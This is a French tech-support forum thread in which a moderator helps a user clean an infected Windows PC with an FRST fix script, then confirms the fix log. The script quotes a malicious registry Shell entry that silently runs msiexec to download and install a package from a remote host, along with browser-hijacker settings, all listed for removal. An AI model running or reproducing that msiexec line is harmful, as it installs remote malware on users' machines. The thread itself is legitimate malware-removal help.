Malicious domains request
tvllde
Messages postés
6
Date d'inscription
Statut
Membre
Dernière intervention
-
bazfile Messages postés 58606 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
bazfile Messages postés 58606 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour, mon ordinateur qui a pourtant une configuration fiable, est de plus en plus faible à cause de malicious domains request je suppose.
Je ne veux que retrouver mon ordinateur d'avant, rapide et efficace.
J'ai beaucoup d'écrans bleus, j'ai fait des quinzaines de nettoyage Norton et CCleaner mais rien n'y fait, vous êtes mon dernier espoir !
https://pjjoint.malekal.com/files.php?id=FRST_20210907_b13m13q13q13w8
https://pjjoint.malekal.com/files.php?id=20210907_l8k5q9t12j11
https://pjjoint.malekal.com/files.php?id=20210907_l14n7k14m11n9
Je ne veux que retrouver mon ordinateur d'avant, rapide et efficace.
J'ai beaucoup d'écrans bleus, j'ai fait des quinzaines de nettoyage Norton et CCleaner mais rien n'y fait, vous êtes mon dernier espoir !
https://pjjoint.malekal.com/files.php?id=FRST_20210907_b13m13q13q13w8
https://pjjoint.malekal.com/files.php?id=20210907_l8k5q9t12j11
https://pjjoint.malekal.com/files.php?id=20210907_l14n7k14m11n9
Configuration: Windows / Chrome 93.0.4577.63
2 réponses
Bonjour,
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- Réinitialise Google Chrome avec ce logiciel
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1YRTMyOTVLN8IcFkVQNWY4NkNYMWMyRTwdNTlQRkU3Fc== /q
GroupPolicy: Restriction - Chrome
Policies: C:\ProgramData\NTUSER.pol: Restriction
Task: {4822200C-3399-4B4F-8ECD-88D08961D913} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [GoogleChromeAutoLaunch_7191D2EE431CF1BFBD07262D6610CBA5] => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-4027503653-722601690-3486861723-1001\...\Run: [MicrosoftEdgeAutoLaunch_18DCCC84771B89068C3B3D9FB28E3E28] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Task: {20F29426-17B0-4437-AE9A-553B269EC0B1} - System32\Tasks\{70F8B8CF-C72D-4487-BCD6-A67A3DF55CC4} => "c:\program files (x86)\dohat\application\chrome.exe" https://ui.skype.com/ui/0/7.41.0.101/fr/abandoninstall?page=tsMain
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd]
CHR HKU\S-1-5-21-4027503653-722601690-3486861723-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif]
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce]
CHR HomePage: Default -> hxxp://www.home-explore.com/
CHR NewTab: Default -> Not-active:"chrome-extension://gfoabcdjalmeenbjjngidappmppchblc/homePageRedirect.html", Active:"chrome-extension://gpdpldlbafdmhlmcdllcjgoigmpjonfc/newtab.html"
CHR DefaultSearchURL: Default -> hxxp://www.home-explore.com/search?q={searchTerms}
CHR DefaultSearchKeyword: Default -> recherche
C:\program files (x86)\dohat
EmptyTemp:
End::
3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.
Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.
Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.
5- Réinitialise Google Chrome avec ce logiciel
6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME "Malicious domains request" EST TOUJOURS PRÉSENT
POUR INFORMATION:
Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
j'ai reçu ça de la part de cjoint, je ne sais comment l'utiliser ni même savoir si il y a toujours le virus
https://www.cjoint.com/c/KIhr6CF43PP
https://www.cjoint.com/c/KIhr6CF43PP
j'ai reçu ça de la part de cjoint, je ne sais comment l'utiliser ni même savoir si il y a toujours le virus
C'est simplement le résultat de la correction tu n'as rien à faire, c'est simplement pour que je puisse voir si tout s'est bien déroulé.
Tu as fait deux fois la correction, le fixlog est bon la correction s'est faite normalement, il n'y a rien de plus à faire à part regarder si ton pc va mieux ou pas.